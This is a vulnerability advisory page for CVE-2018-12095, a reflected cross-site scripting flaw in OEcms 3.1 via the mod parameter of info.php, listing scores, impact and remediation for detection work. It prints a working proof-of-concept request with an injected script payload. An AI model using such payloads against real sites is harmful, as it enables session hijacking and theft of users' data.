🔙 목록으로 돌아가기

CVE-2018-12095: OEcms 3.1 - Cross-Site Scripting

TitleOEcms 3.1 - Cross-Site Scripting
AuthorLogicalHunter
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest patch or upgrade to a newer version of OEcms to fix the XSS vulnerability.
CVSS Score5.4
EPSS Score0.12697
CVE IDCVE-2018-12095
CWE IDCWE-79
Tags cve2018 cve xss edb oecms_project vuln

🔍 Vulnerability Description

OEcms 3.1 is vulnerable to reflected cross-site scripting via the mod parameter of info.php.

🌐 HTTP Request

GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12095.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-12095.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A